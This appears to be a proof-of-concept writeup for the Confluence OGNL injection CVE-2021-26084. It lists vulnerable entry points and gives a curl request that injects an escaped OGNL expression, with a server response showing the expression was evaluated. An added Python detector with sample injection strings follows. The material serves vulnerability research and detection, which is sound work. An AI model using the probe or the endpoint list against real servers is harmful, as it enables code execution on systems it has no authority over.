PoC details: 1697ea35ef508d0f0da1159c6f857e86158c7d7e

Related vulnerability
Title: Atlassian Confluence Server injection vulnerability (CVE-2021-26084)
Description: Atlassian Confluence Server is the server edition of a collaboration suite from the Australian company Atlassian, offering enterprise knowledge management and support for building enterprise wikis. Atlassian Confluence Server and Data Center contain an injection vulnerability through which an authenticated user can execute arbitrary code on a Confluence Server or Data Center instance. The following products and versions are affected: All 4.x.x versions, All 5.x.x versions, All 6.0.x versions, All 6.1.x ver
Introduction
# CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injection

An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.

![poc](https://user-images.githubusercontent.com/3140111/131589227-c305cfb8-bcb9-4c87-a814-9b898fd2f393.png)

My fight to locate the entry points and injections XD

Fight (1) | Fight (2)
 --- | ---
![2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium](https://user-images.githubusercontent.com/3140111/131591912-bfe20ca8-df08-477c-af1c-1c3f3aacbb17.png) | ![2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium](https://user-images.githubusercontent.com/3140111/131591918-1023e2de-3391-46cd-af2a-14d9cac25e63.png)

Confluence entry points finally exploited:

```
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action
```
My first manual inspection (note: pre-authenticated user):

```
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

Server Response: 

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />
```
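The probe above smuggles the closing quote as the escape `\u0027` and the `+` as `%2b`, so a filter or log search that only looks for a literal `#{` in the raw body sees nothing useful. As an added example (not part of the PoC repository), here is a small Python detector that normalizes request parameters the way that probe is encoded (URL decoding followed by `\uXXXX` resolution) and flags requests to the entry points listed above that carry an OGNL expression opener. The `METHOD PATH BODY` log format and the sample lines are constructed for this example; the entry-point list is the one given above, and the marker patterns are assumptions about what a reviewer would want to flag.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Confluence entry points named in the PoC above (paths only; host stripped).
SUSPECT_PATHS = {
    "/users/user-dark-features",
    "/login",
    "/pages/templates2/viewpagetemplate.action",
    "/template/custom/content-editor",
    "/templates/editor-preload-container",
    "/pages/createpage-entervariables.action",
}

# An OGNL expression opener: #{ ... }, ${ ... } or %{ ... } (assumed marker set).
OGNL_OPENER = re.compile(r"[#$%]\{")
# Java/OGNL-style \uXXXX escapes, which the PoC uses to hide the quote character.
UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def normalize(value: str) -> str:
    """URL-decode, then resolve \\uXXXX escapes, so an obfuscated value
    compares the same way as its plain form."""
    decoded = unquote_plus(value)
    return UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), decoded)


def parse_body(body: str) -> dict:
    """Split a form-encoded body (or query string) into raw, still-encoded pairs."""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, raw = pair.partition("=")
        params[unquote_plus(key)] = raw
    return params


def inspect_request(method: str, path: str, body: str) -> Optional[dict]:
    """Return a finding when a request to a listed entry point carries an
    OGNL expression opener in any parameter after normalization."""
    if path not in SUSPECT_PATHS:
        return None
    for name, raw in parse_body(body).items():
        value = normalize(raw)
        if OGNL_OPENER.search(value):
            return {"method": method, "path": path, "param": name, "decoded": value}
    return None


def scan(lines):
    """Each constructed log line is 'METHOD PATH BODY' (BODY may be empty)."""
    findings = []
    for line in lines:
        parts = line.split(" ", 2)
        method, path = parts[0], parts[1]
        body = parts[2] if len(parts) == 3 else ""
        finding = inspect_request(method, path, body)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    # the page's own probe: quotes as \u0027, '+' as %2b
    r"POST /pages/createpage-entervariables.action queryString=alt3kx\u0027%2b#{6*666}%2b\u0027",
    # benign value on the same entry point
    "POST /pages/createpage-entervariables.action queryString=alt3kx",
    # opener fully URL-encoded, on another listed entry point
    "GET /users/user-dark-features queryString=%24%7B1%2B1%7D",
    # opener itself hidden behind \u escapes
    r"POST /template/custom/content-editor queryString=x\u0027%2b\u0023\u007b7*7\u007d%2b\u0027",
    # normal login, not flagged
    "POST /login os_username=bob&os_password=hunter2",
    # opener present, but not on a listed entry point
    "POST /rest/api/search queryString=%23%7B1%7D",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['method']} {f['path']} param={f['param']} decoded={f['decoded']}")
```

The decoded value is kept in each finding so an analyst sees `alt3kx'+#{6*666}+'` rather than the escaped form, which also makes it easy to spot the reflected `{3996=null}` in the matching response as evidence that the expression was evaluated rather than merely echoed.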

# References
https://jira.atlassian.com/browse/CONFSERVER-67940 <br/>
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html <br/>

Amazing writeup posted here: <br/> 
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Some very useful hints by: <br/>
<em><a href="https://twitter.com/wvuuuuuuuuuuuuu" rel="nofollow">@wvuuuuuuuuuuuuu</a></em><br/>
<em><a href="https://twitter.com/iamnoooob" rel="nofollow">@iamnoooob</a></em><br/>
# Author
Alex Hernandez aka <em><a href="https://twitter.com/_alt3kx_" rel="nofollow">(@\_alt3kx\_)</a></em>
File snapshot

```
[4.0K] /data/pocs/1697ea35ef508d0f0da1159c6f857e86158c7d7e
├── [ 34K] LICENSE
└── [2.3K] README.md

0 directories, 2 files
```